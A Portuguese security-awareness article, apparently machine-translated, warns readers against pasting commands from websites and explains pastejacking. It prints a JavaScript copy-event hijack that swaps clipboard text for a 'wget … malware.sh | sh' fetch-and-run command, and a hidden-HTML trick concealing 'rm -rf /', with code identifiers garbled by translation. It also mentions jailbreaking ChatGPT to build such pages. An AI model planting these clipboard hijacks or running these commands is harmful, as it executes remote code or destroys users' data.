Por que você deve evitar copiar e colar comandos da Internet? Causas, repercussões e como lidar com elas com segurança

Num mundo em rápido desenvolvimento, copiar e colar comandos da Internet pode parecer uma solução rápida e eficaz para resolver os nossos problemas técnicos. No entanto, esta prática pode ser arriscada, pois pode expor a sua segurança e privacidade a ameaças ocultas. Essa prática precipitada pode ter efeitos negativos em nossos dispositivos e dados pessoais.

De computadores a telefones celulares, copiar e colar está em toda parte. Isso torna a vida mais fácil e economiza tempo, pois você não precisa digitar comandos longos ou scripts redundantes. No entanto, se você não for cuidadoso o suficiente, poderá ser hackeado simplesmente copiando algum código encontrado na web e colando-o no seu computador.

Neste artigo, revisaremos detalhadamente os possíveis motivos pelos quais você deve considerar seriamente não copiar e colar comandos da Internet e destacar as implicações de segurança e privacidade dessa prática. Também abordaremos estratégias e dicas para lidar com essas situações com segurança e responsabilidade, permitindo-nos aproveitar os benefícios da Internet sem os riscos. Vamos aprender como copiar e colar pode fazer com que você seja hackeado e o que você deve fazer para evitar que isso aconteça. Verificar Métodos comuns usados ​​por hackers para invadir sua conta bancária.

Por que você não deve copiar e colar comandos

Quer você seja novo no uso da linha de comando ou um veterano experiente, você pode ficar tentado a copiar e colar comandos da Internet para economizar seu tempo, realizar o trabalho real com mais rapidez e ser mais produtivo. No entanto, você deve estar ciente de que sites maliciosos, na verdade, usam caixas de código como arma para injetar código malicioso quando você copia e cola comandos diretamente no Terminal ou Prompt de Comando.

Esses atores maliciosos usam vários truques de front-end para ocultar comandos maliciosos por trás de códigos aparentemente inofensivos.

Algo como Sudo apt-get update && apt-get upgrade Geralmente deve atualizar repositórios e atualizar pacotes no Linux. No entanto, se você não estiver ciente e copiar e colar este comando diretamente no Terminal, você pode, sem saber, estar executando código malicioso com privilégios de root devido ao prefixo sudo.

Na pior das hipóteses, a execução do comando pode levar ao controle completo do seu sistema ou até mesmo a um ataque de ransomware. Mas como os atores da ameaça fazem isso? Como os comandos maliciosos podem ser escondidos atrás de códigos inofensivos?

Como funcionam as explorações de códigos maliciosos

Essa exploração pode ser realizada usando código Java Script inteligentemente elaborado ou até mesmo código HTML básico. Java Script possui um mecanismo chamado EventListener. São ações que podem ocorrer no navegador, como clicar em um botão, enviar um formulário, mover o mouse, pressionar teclas ou redimensionar uma janela.

EventListener, como o nome sugere, permite que seu aplicativo web reaja a eventos específicos acionados pela ação do usuário. Páginas web maliciosas exploram esse mecanismo legítimo e útil, capturando o evento em que um usuário copia texto e substituindo o texto inofensivo por código malicioso.

Aqui está o principal código de exploração usado para criar a imagem de teste:

<escrita>documento.addEventListener('cópia', função(evento) { evento.preventDefault();
 const texto copiado = "wget ​​​​http://localhost:8000/malware.sh | sh"; evento.Dados da área de transferência.definir dados('texto/simples', texto copiado); });
</escrita>

Aqui está outra demonstração, que não requer Java Script e usa HTML básico:

<p>
sudo apt-get instalar google-chrome-stable
<palmoestilo="cor:branco;tamanho da fonte:0pt;">rm-rf /</palmo></p>

Este código cria texto branco invisível, ocultando efetivamente o comando malicioso “rm -rf /”. Cria uma quebra de linha para que algumas janelas do Terminal executem o código imediatamente quando colado. Você pode pensar que é necessário um forte conhecimento de programação e habilidades de desenvolvimento web para realizar esse ataque, mas na realidade é muito fácil.

Mesmo que um invasor não tenha conhecimento de Java Script ou desenvolvimento web, ele pode facilmente Criando malware usando ChatGPT. Usando as instruções certas, pode-se facilmente Jailbreak do ChatGPT E faça com que ele crie páginas da web maliciosas que aproveitem esse truque.

Como você pode se proteger?

Não existe uma maneira concreta de se proteger contra ataques de códigos maliciosos. Claro, você pode proibir o Java Script para sites suspeitos, mas, por sua natureza, eles provavelmente não permitirão que você navegue sem o Java Script ativado.

Além disso, para o método CSS (Cascading Style Sheets), não há defesa concreta contra comandos maliciosos, uma vez que ainda é um código CSS válido (ou seja, não há erro ao escrever o código, mas a intenção ainda é maliciosa). A melhor forma de se proteger é seguir regras básicas de higiene online e reconhecer ameaças com bom senso.

Não visite links desconhecidos e sempre cole o comando copiado da Internet em um editor de texto antes de colá-lo no Terminal. Atenha-se a recursos de código legítimos e confiáveis ​​para garantir que você não receba nenhum código malicioso em sua linha de comando.

Além disso, alguns aplicativos Terminal, como o xfce4, vêm pré-equipados com proteção contra cópia e colagem. Ele exibirá uma janela pop-up informando exatamente o que será executado depois que você colar um comando na janela do prompt de comando. Verifique se o Terminal que você está usando também possui um mecanismo semelhante e ative-o. Verificar Dicas essenciais para usuários avançados do Ubuntu Linux.

Executar código malicioso é extremamente perigoso

Mesmo que você tenha um antivírus instalado, certas formas de execução de códigos maliciosos ainda podem penetrar nas barreiras de proteção do seu dispositivo. É por isso que é importante ter cuidado com o código que você copia online e usar medidas de proteção sempre que possível para se manter seguro. Você pode ver agora Recursos incríveis de programação sem código para criar aplicativos e construir sites sem código.

Ir para o botão superior